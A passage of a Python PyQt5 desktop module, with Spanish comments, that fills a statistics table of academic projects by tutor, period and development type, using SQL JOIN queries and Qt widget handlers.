document\r\n\t\tself.c = \"\"\r\n\r\n\t\tself.origen = \"\"\r\n\t\tself.destino = \"\"\r\n\t\tself.bdvacia = 0\r\n\t\tself.detallado = 0\r\n\t\tself.contlinea = 0\r\n\t\tself.IdProyecto = 0\r\n\t\tself.IdPeriodo = 0\r\n\t\tself.cedula = 0\r\n\t\tself.fechaini = 0\r\n\t\tself.fechafin = 0\r\n\t\tself.totalSecciones = 0\r\n\t\tself.imprimir_encabezado = 0\r\n\t\tself.cedula_tutor=\"\"\r\n\t\tself.nombre_tutor=\"\"\r\n\t\tself.cedula_anterior=\"\"\r\n\t\tself.TotalRegistros = 0\r\n\t\tself.TotalTutores = 0\r\n\t\tself.TotalEstudiantes = 0\r\n\t\tself.TotalProyectos = 0\r\n\t\tself.TotalSInformacion = 0\r\n\t\tself.TotalDWeb = 0\r\n\t\tself.TotalRedes = 0\r\n\t\tself.TotalApps = 0\r\n\t\tself.TotalTutorEstudiantes = 0\r\n\t\tself.TotalTutorProyectos = 0\r\n\t\tself.TotalTutorSInformacion = 0\r\n\t\tself.TotalTutorDWeb = 0\r\n\t\tself.TotalTutorRedes = 0\r\n\t\tself.TotalTutorApps = 0\r\n\t\tself.TotalGeneralProyectos = 0\r\n\t\tself.TotalGeneralSInformacion = 0\r\n\t\tself.TotalGeneralDWeb = 0\r\n\t\tself.TotalGeneralRedes = 0\r\n\t\tself.TotalGeneralApps = 0\r\n\t\tself.RegistroActual = 0\r\n\t\tself.ano_periodo = \"\"\r\n\t\tself.trayecto = \"\"\r\n\t\tself.seccion = \"\"\r\n\t\tself.tipo_trayecto = 
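# --- editor's aside (illustrative sketch, not part of the original record) ---
# The strftime patterns defined in __init__ above, exercised on a fixed,
# hypothetical date: "%d-%m-%Y" for display and "%Y-%m-%d-%H%M%S" for the
# PDF file-name timestamp; "%m" and "%Y" feed meses() and the year field.
from datetime import datetime
d = datetime(2018, 10, 4, 13, 5, 0)
print(d.strftime("%d-%m-%Y"))         # -> 04-10-2018
print(d.strftime("%Y-%m-%d-%H%M%S"))  # -> 2018-10-04-130500
print(d.strftime("%m"), d.strftime("%Y"))  # -> 10 2018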
\"\"\r\n\t\tself.ano_prosecucion = \"\"\r\n\t\tself.linea = 0\r\n\t\tself.hoy = datetime.today()\r\n\t\tself.formato_fecha = \"%d-%m-%Y\"\r\n\t\tself.formato_fecha2 = \"%Y\"\r\n\t\tself.AnoActual = self.hoy.strftime(self.formato_fecha2)\r\n\t\tself.FechaActual = self.hoy.strftime(self.formato_fecha)\r\n\t\t# Configuracion Tabla Grupos de Proyecto\r\n\t\tself.tablaEstadisticas.setAlternatingRowColors(True) #Instruccion para Alternar color de las filas\r\n\t\tself.tablaEstadisticas.setEditTriggers(QTableWidget.NoEditTriggers) #Instruccion para deshabilitar edicion\r\n\t\tself.tablaEstadisticas.setDragDropOverwriteMode(False) # Deshabilitar el comportamiento de arrastrar y soltar\r\n\t\tself.tablaEstadisticas.setSelectionBehavior(QTableWidget.SelectRows) # Seleccionar toda la fila\r\n\t\tself.tablaEstadisticas.setSelectionMode(QTableWidget.SingleSelection) # Seleccionar una fila a la vez\r\n\t\tself.tablaEstadisticas.setTextElideMode(Qt.ElideRight)# Qt.ElideNone \r\n\t\t # Especifica dónde deben aparecer los puntos suspensivos \"...\" cuando se muestran \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t # textos que no encajan\r\n\t\tself.tablaEstadisticas.setWordWrap(True) # Establecer el ajuste de palabras del texto \r\n\t\tself.tablaEstadisticas.setSortingEnabled(True) # Habilitar clasificación\r\n\t\tself.tablaEstadisticas.setColumnCount(13) # Establecer el número de columnas\r\n\t\tself.tablaEstadisticas.setRowCount(0) # Establecer el número de filas\r\n\t\tself.tablaEstadisticas.horizontalHeader().setDefaultAlignment(Qt.AlignHCenter|Qt.AlignVCenter| Qt.AlignCenter) # Alineación del texto del encabezado\r\n\t\tself.tablaEstadisticas.horizontalHeader().setHighlightSections(True) # Deshabilitar resaltado del texto del encabezado al seleccionar una fila\r\n\t\tself.tablaEstadisticas.horizontalHeader().setStretchLastSection(True) # Hacer que la última sección visible del encabezado ocupa todo el espacio disponible\r\n\t\tself.tablaEstadisticas.verticalHeader().setVisible(False) # Ocultar encabezado vertical\r\n\t\tself.tablaEstadisticas.verticalHeader().setDefaultSectionSize(20) # Establecer altura de las filas\r\n\t\tnombreColumnasProyecto = (\"Cedula Tutor\", \"Nombre\", \"Periodo\", \"Trayecto\", \"Seccion\", \"Tipo de Trayecto\", \"Año Prosecucion\", \"Total Proyectos\", \"Total Estudiantes\", \"Total S. Informacion\", \"Total D. 
WEB\", \"Total Redes\", \"Total APP Móviles\")\r\n\t\t# Establecer las etiquetas de encabezado horizontal usando etiquetas\r\n\t\tself.tablaEstadisticas.setHorizontalHeaderLabels(nombreColumnasProyecto)\r\n\t\t# Establecer ancho de las columnas\r\n\t\tfor indice, ancho in enumerate((80, 150, 60, 60, 60, 100, 100, 100, 120, 120, 120, 120, 120 ), start=0):\r\n\t\t\tself.tablaEstadisticas.setColumnWidth(indice, ancho)\r\n\r\n\t\t# Ocultar campos iniciales\r\n\t\tself.txtCedula.setEnabled(False)\r\n\t\tself.txtCedula.setText(\"0\")\r\n\t\tself.txtTutor.setText(\"\")\r\n\t\tself.txtTutor.hide()\r\n\t\tself.lblTutor.hide()\r\n\t\tself.txtCedulaSeleccionada.hide()\r\n\t\tself.chkTutor.setChecked(False)\r\n\t\tself.chkPeriodo.setChecked(False)\r\n\t\tself.grpFechas.setEnabled(False)\r\n\t\tself.cmbFechaini.setEnabled(False)\r\n\t\tself.cmbFechafin.setEnabled(False)\r\n\t\tself.cmbFechaini.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\tself.btnReset.setEnabled(False)\r\n\t\tself.btnBuscarTutor.setEnabled(False)\r\n\r\n\t\t# Ocultar Lista de Tutores\r\n\t\tself.grpTutores.hide()\r\n\t\t#------------------------------------------------#\r\n\t\t# Botones y Disparadores Eventos Tab Principal #\r\n\t\t#\r\n\t\t\r\n\t\t# Vincular eventos de click de los botones a las funciones correspondientes\r\n\t\tself.btnGeneraEstadistica.clicked.connect(self.LlenarEstadistica)\r\n\t\tself.btnReset.clicked.connect(self.resetEstadistica)\r\n\t\tself.btnBuscarTutor.clicked.connect(self.AsignaTutor)\r\n\t\tself.btnSelTutor.clicked.connect(self.ElejirTutor)\r\n\t\tself.btnRetorno.clicked.connect(self.RetornoTutor)\r\n\t\tself.btnCerrar.clicked.connect(self.cerrar)\r\n\t\tself.chkTutor.clicked.connect(self.chequeoTutor)\r\n\t\tself.chkPeriodo.clicked.connect(self.chequeoPeriodo)\r\n\t\tself.optAnual.clicked.connect(self.chequeoGrpFechas)\r\n\t\tself.optRango.clicked.connect(self.chequeoGrpFechas)\r\n\t\tself.optDetallado.clicked.connect(self.chequeoTipoEstadistica)\r\n\t\tself.optConsolidado.clicked.connect(self.chequeoTipoEstadistica)\r\n\t\tself.btnImprime.clicked.connect(self.emitirEstadistica)\r\n\t\tself.ListaTutores.itemDoubleClicked.connect(self.ElejirTutor)\r\n\t\tself.ListaTutores.itemClicked.connect(self.actCedulaBuscar)\r\n\t\tself.optCedula.clicked.connect(self.ordenarTabla)\r\n\t\tself.optNombre.clicked.connect(self.ordenarTabla)\r\n\t\tself.optApellido.clicked.connect(self.ordenarTabla)\r\n\t\tself.txtFiltro.textChanged.connect(self.buscarDato)\r\n\r\n\t# Rutina para ordenar la lista de tutores\r\n\tdef ordenarTabla(self):\r\n\t\tif self.optCedula.isChecked():\r\n\t\t\tself.ListaTutores.horizontalHeader().setSortIndicator(0, Qt.AscendingOrder)\r\n\t\telif self.optNombre.isChecked():\r\n\t\t\tself.ListaTutores.horizontalHeader().setSortIndicator(1, Qt.AscendingOrder)\r\n\t\telse:\r\n\t\t\tself.ListaTutores.horizontalHeader().setSortIndicator(2, Qt.AscendingOrder)\r\n\r\n\t# Rutina para actualizar el campo de busqueda con la cedula del tutor al hacer click en \r\n\t# un registro de la tabla\r\n\tdef actCedulaBuscar(self):\r\n\t\tfila = self.ListaTutores.currentRow()\r\n\t\ttotalregistros = self.ListaTutores.rowCount()\r\n\t\tcedula = self.ListaTutores.item(fila, 0).text().replace(\" \", \"\")\r\n\t\tself.txtCedulaSeleccionada.setText(cedula)\r\n\r\n\t# Rutina para fijar el cursor de la tabla al ir introduciendo datos en el campo de busqueda de\r\n\t# acuerdo al ordenamiento de la tabla\r\n\tdef buscarDato(self):\r\n\t\tlv_texto = 
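# --- editor's aside (illustrative sketch, not part of the original record) ---
# A minimal reduction of the QTableWidget configuration above: read-only
# cells, whole-row single selection, fixed column widths. Runnable where a
# Qt display is available; labels and widths here are hypothetical.
import sys
from PyQt5.QtWidgets import QApplication, QTableWidget
app = QApplication(sys.argv)
tabla = QTableWidget()
tabla.setColumnCount(3)
tabla.setRowCount(0)
tabla.setHorizontalHeaderLabels(("A", "B", "C"))
tabla.setEditTriggers(QTableWidget.NoEditTriggers)      # disable editing
tabla.setSelectionBehavior(QTableWidget.SelectRows)     # select whole rows
tabla.setSelectionMode(QTableWidget.SingleSelection)    # one row at a time
for indice, ancho in enumerate((80, 150, 60)):
    tabla.setColumnWidth(indice, ancho)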
self.txtFiltro.text().upper()\r\n\t\tif self.optCedula.isChecked()== True:\r\n\t\t\tvalidar = re.match('^[0-9\\s]+$', lv_texto, re.I)\r\n\t\t\tcolumna = 0\r\n\t\telif self.optNombre.isChecked()==True:\t\r\n\t\t\tvalidar = re.match('^[a-zA-Z0-9\\sáéíóúàèìòùäëïöüñ]+$', lv_texto, re.I)\r\n\t\t\tcolumna = 1\r\n\t\telse:\r\n\t\t\tvalidar = re.match('^[a-zA-Z0-9\\sáéíóúàèìòùäëïöüñ]+$', lv_texto, re.I)\r\n\t\t\tcolumna = 2\r\n\t\tindex = self.ListaTutores.rowCount()\r\n\t\tfila=0\r\n\t\tencontrar = 0\r\n\t\twhile fila < index:\r\n\t\t\tlv_busqueda = self.ListaTutores.item(fila,columna).text()\r\n\t\t\tif lv_texto in lv_busqueda:\r\n\t\t\t\tencontrar = 1\r\n\t\t\t\tbreak;\r\n\t\t\tfila = fila + 1\r\n\t\tif encontrar == 1:\r\n\t\t\tposicion = self.ListaTutores.item(fila, columna)\r\n\t\t\tself.ListaTutores.scrollToItem(posicion)\r\n\t\t\tself.ListaTutores.setCurrentCell(fila, columna)\r\n\t\t\tself.txtCedulaSeleccionada.setText(self.ListaTutores.item(fila, 0).text().replace(\" \", \"\"))\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\r\n\r\n\t# Rutina para activar los botones de seleccion de busqueda\r\n\tdef activa_botones(self):\r\n\t\tself.grpTipo.setEnabled(True)\r\n\t\tself.btnReset.setEnabled(False)\r\n\t\tself.btnBuscarTutor.setEnabled(True)\r\n\t\tself.btnGeneraEstadistica.setEnabled(True)\r\n\t\tself.chkTutor.setEnabled(True)\r\n\t\tself.chkPeriodo.setEnabled(True)\r\n\t\tself.chkTutor.setChecked(False)\r\n\t\tself.chkPeriodo.setChecked(False)\r\n\r\n\t# Rutina para desactivar los botones de seleccion de busqueda\r\n\tdef desactiva_botones(self):\r\n\t\tself.grpTipo.setEnabled(False)\r\n\t\tself.btnReset.setEnabled(True)\r\n\t\tself.btnBuscarTutor.setEnabled(False)\r\n\t\tself.btnGeneraEstadistica.setEnabled(False)\r\n\t\tself.chkTutor.setEnabled(False)\r\n\t\tself.chkPeriodo.setEnabled(False)\r\n\t\tself.txtCedula.setEnabled(False)\r\n\t\tself.grpFechas.setEnabled(False)\r\n\t\tself.cmbFechaini.setEnabled(False)\r\n\t\tself.cmbFechafin.setEnabled(False)\r\n\t\t\r\n\r\n\t# Rutina para vaciar la tabla para nueva busqueda\r\n\tdef resetEstadistica(self):\r\n\t\tif self.TotalRegistros > 0:\r\n\t\t\tself.tablaEstadisticas.clearSelection()\r\n\t\t\tself.tablaEstadisticas.clearContents()\r\n\t\t\tindex2 = self.TotalRegistros\r\n\t\t\tindex3 = 0\r\n\t\t\twhile index2 > 0:\r\n\t\t\t\tindex3 = index2 - 1\r\n\t\t\t\tself.tablaEstadisticas.removeRow(index3)\r\n\t\t\t\tindex2 = index2 - 1\r\n\t\tself.optAnual.setChecked(True)\r\n\t\tself.chequeoGrpFechas()\r\n\t\tself.activa_botones()\r\n\t\tself.txtCedula.setText(\"\")\r\n\t\tself.chkPeriodo.setChecked(False)\r\n\t\tself.chequeoTutor()\r\n\r\n\t# Rutina para activar o desactivar campos de acuerdo al tipo de estadistica\r\n\tdef chequeoTipoEstadistica(self):\r\n\t\tif self.optDetallado.isChecked():\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(3, False)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(4, False)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(5, False)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(6, False)\t\r\n\t\telse:\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(3, True)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(4, True)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(5, True)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(6, True)\r\n\r\n\t# Rutina para activar o desactivar campos de tutor acuerdo seleccion de tutor unico o general\r\n\tdef chequeoTutor(self):\r\n\t\tif 
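# --- editor's aside (illustrative sketch, not part of the original record) ---
# The incremental search in buscarDato above is a linear scan for the first
# row whose cell contains the typed text; a self-contained sketch with a
# hypothetical cedula column:
celdas = ["4025551", "4025678", "8123456"]
texto = "812"
fila = next((i for i, celda in enumerate(celdas) if texto in celda), None)
print(fila)  # -> 2 (None when nothing matches)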
self.chkTutor.isChecked():\r\n\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\tself.txtCedula.setEnabled(True)\r\n\t\t\tself.lblTutor.show()\r\n\t\t\tself.txtTutor.show()\r\n\t\t\tself.txtTutor.setText(\"\")\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(0, True)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(1, True)\r\n\t\t\tself.btnBuscarTutor.setEnabled(True)\r\n\t\telse:\r\n\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\tself.txtCedula.setEnabled(False)\r\n\t\t\tself.lblTutor.hide()\r\n\t\t\tself.txtTutor.hide()\r\n\t\t\tself.txtTutor.setText(\"\")\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(0, False)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(1, False)\r\n\t\t\tself.btnBuscarTutor.setEnabled(False)\r\n\r\n\t# Rutina para hailitar o deshabilitar busqueda por periodo \r\n\tdef chequeoPeriodo(self):\r\n\t\tif self.chkPeriodo.isChecked():\r\n\t\t\tself.grpFechas.setEnabled(True)\r\n\t\t\tself.optAnual.setChecked(True)\r\n\t\t\tself.cmbFechaini.setEnabled(True)\r\n\t\t\tself.cmbFechafin.setEnabled(False)\r\n\t\t\tself.cmbFechaini.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\telse:\r\n\t\t\tself.grpFechas.setEnabled(False)\r\n\t\t\tself.optAnual.setChecked(True)\r\n\t\t\tself.cmbFechaini.setEnabled(False)\r\n\t\t\tself.cmbFechafin.setEnabled(False)\r\n\t\t\tself.cmbFechaini.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\r\n\t# Rutina para habilitar busqueda por fecha simple o rango de fechas\r\n\tdef chequeoGrpFechas(self):\r\n\t\tif self.optAnual.isChecked():\r\n\t\t\tself.cmbFechafin.setEnabled(False)\r\n\t\t\tself.cmbFechaini.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\telse:\r\n\t\t\tself.cmbFechafin.setEnabled(True)\r\n\t\t\tself.cmbFechaini.setCurrentIndex(0)\r\n\t\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\r\n\t# Rutina para cargar la tabla de tutores \r\n\tdef cargaTutores(self):\r\n\t\tindex2 = self.ListaTutores.rowCount()\r\n\t\tif index2 > 0:\r\n\t\t\tself.ListaTutores.clearSelection()\r\n\t\t\tself.ListaTutores.clearContents()\r\n\t\t\tindex3 = 0\r\n\t\t\twhile index2 > 0:\r\n\t\t\t\tindex3 = index2 - 1\r\n\t\t\t\tself.ListaTutores.removeRow(index3)\r\n\t\t\t\tindex2 = index2 - 1\r\n\t\tcursor_lista_tutores = \"SELECT cedula_tutor, nombre_tutor, apellido_tutor FROM tutores WHERE estado = 'Activo' order by cedula_tutor\"\r\n\t\tself.cursor.execute(cursor_lista_tutores)\r\n\t\tindex = 0\r\n\t\tfor rows in self.cursor:\r\n\t\t\tself.ListaTutores.insertRow(index)\r\n\t\t\tlvcedula = str(rows[0])\r\n\t\t\tlvnombre = str(rows[1])\r\n\t\t\tlvapellido = str(rows[2])\r\n\t\t\tself.ListaTutores.setItem(index, 0, QTableWidgetItem((' '+lvcedula)[-8:]))\r\n\t\t\tself.ListaTutores.setItem(index, 1, QTableWidgetItem(lvnombre))\r\n\t\t\tself.ListaTutores.setItem(index, 2, QTableWidgetItem(lvapellido))\r\n\t\t\tindex = index + 1\r\n\r\n\t# Rutina para extraer los datos de un tutor de la base de datos\r\n\tdef consulta_tutor(self,lvcedula):\r\n\t\tif lvcedula == '0' or lvcedula == '':\r\n\t\t\tself.txtTutor=''\r\n\t\telse:\r\n\t\t\tbdbuscar_tutor = \"SELECT cedula_tutor, nombre_tutor, apellido_tutor, estado from tutores where cedula_tutor = %i\" % int(lvcedula)\r\n\t\t\tself.cursor.execute(bdbuscar_tutor)\r\n\t\t\trows=self.cursor.fetchone()\r\n\t\t\tif rows == None:\r\n\t\t\t\tself.encontrar = 0\r\n\t\t\t\tself.txtTutor.setText('')\r\n\t\t\telse:\r\n\t\t\t\tif 
str(rows[3]) == 'Inactivo':\r\n\t\t\t\t\tcontinuar = 0\r\n\t\t\t\t\tvtutor = (str(rows[1]) + ' ' + str(rows[2]))\r\n\t\t\t\t\trespuesta = QMessageBox.warning(self,\"Precaucion...\", \"El Tutor \" + vtutor + \" seleccionado esta inactivo\\n Desea continuar?\", QMessageBox.Yes | QMessageBox.No) \r\n\t\t\t\t\tif respuesta == QMessageBox.Yes:\r\n\t\t\t\t\t\tcontinuar = 1\r\n\t\t\t\t\telse: \r\n\t\t\t\t\t\tself.txtTutor.setText(\"\")\r\n\t\t\t\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tcontinuar = 1\r\n\t\t\t\tif continuar == 1:\r\n\t\t\t\t\tself.txtTutor.setText(str(rows[1]) + ' ' + str(rows[2]))\r\n\t\t\t\t\tself.encontrar = 1\r\n\t\t\tif self.encontrar == 0:\r\n\t\t\t\trespuesta = QMessageBox.warning(self,\"Error...\", \"Cedula del Tutor no esta registrado, dirijase al modulo de registro de tutores y añada nuevo tutor o seleccione uno de la lista\\n Desea acceder a la lista?\", QMessageBox.Yes | QMessageBox.No)\r\n\t\t\t\tif respuesta == QMessageBox.Yes:\r\n\t\t\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\t\t\tself.AsignaTutor()\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\t\t\tself.txtTutor.setText('')\r\n\r\n\t# Rutina para asignar tutor a la busqueda de estadisticas\r\n\tdef AsignaTutor(self):\r\n\t\t#self.cargaTutores()\r\n\t\tif self.txtCedula.text()=='' or self.txtCedula.text()=='0':\r\n\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\tself.cargaTutores()\r\n\t\t\tself.grpTutores.show()\r\n\t\telse:\r\n\t\t\tlv_cedula_tutor = int(self.txtCedula.text())\r\n\t\t\tself.consulta_tutor(str(lv_cedula_tutor))\r\n\r\n\t# Rutina para elejir un tutor de la lista de busqueda\r\n\tdef ElejirTutor(self):\r\n\t\tif self.ListaTutores.currentRow() == -1:\r\n\t\t\tQMessageBox.information(self,\"Base de Datos\", \"Debe seleccionar un tutor de la lista\", QMessageBox.Ok)\r\n\t\telse:\r\n\t\t\trow = self.ListaTutores.currentRow()\r\n\t\t\tself.txtCedula.setText(self.txtCedulaSeleccionada.text())\r\n\t\t\tself.txtTutor.setText(self.ListaTutores.item(row, 1).text() + \" \" + self.ListaTutores.item(row, 2).text())\r\n\t\tself.grpTutores.hide()\r\n\r\n\t# Rutina para retornar sin elejir tutor de la lista de busqueda\r\n\tdef RetornoTutor(self):\r\n\t\trespuesta = QMessageBox.warning(self,\"Base de Datos\", \"Esta seguro de no elejir ningun tutor?\", QMessageBox.Yes | QMessageBox.No)\r\n\t\tif respuesta == QMessageBox.Yes:\r\n\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\tself.txtTutor.setText(\"\")\r\n\t\tself.grpTutores.hide()\r\n\r\n\t# Rutina para cargar los datos en la tabla de estadistica de acuerdo a la seleccion del usuario\r\n\tdef LlenarEstadistica(self):\r\n\t\tself.desactiva_botones()\r\n\t\tself.tablaEstadisticas.setRowCount(0)\r\n\t\tself.cedula = int(self.txtCedula.text())\r\n\t\tself.fechaini = int(self.cmbFechaini.currentText())\r\n\t\tself.fechafin = int(self.cmbFechafin.currentText())\r\n\t\tif self.chkTutor.isChecked():\r\n\t\t\tif self.chkPeriodo.isChecked():\r\n\t\t\t\tif self.optAnual.isChecked():\r\n\t\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON 
proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tut.cedula_tutor='%i' AND sec.ano_seccion = '%i' \r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.cedula, self.fechaini)\r\n\t\t\t\telse:\r\n\t\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tut.cedula_tutor='%i' AND tray.periodo_academico >= %i AND tray.periodo_academico <= %i \r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.cedula, self.fechaini, self.fechafin)\r\n\t\t\telse:\r\n\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = 
tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tut.cedula_tutor='%i'\r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.cedula)\r\n\t\telse:\r\n\t\t\tif self.chkPeriodo.isChecked():\r\n\t\t\t\tif self.optAnual.isChecked():\r\n\t\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tray.periodo_academico ='%i'\r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, 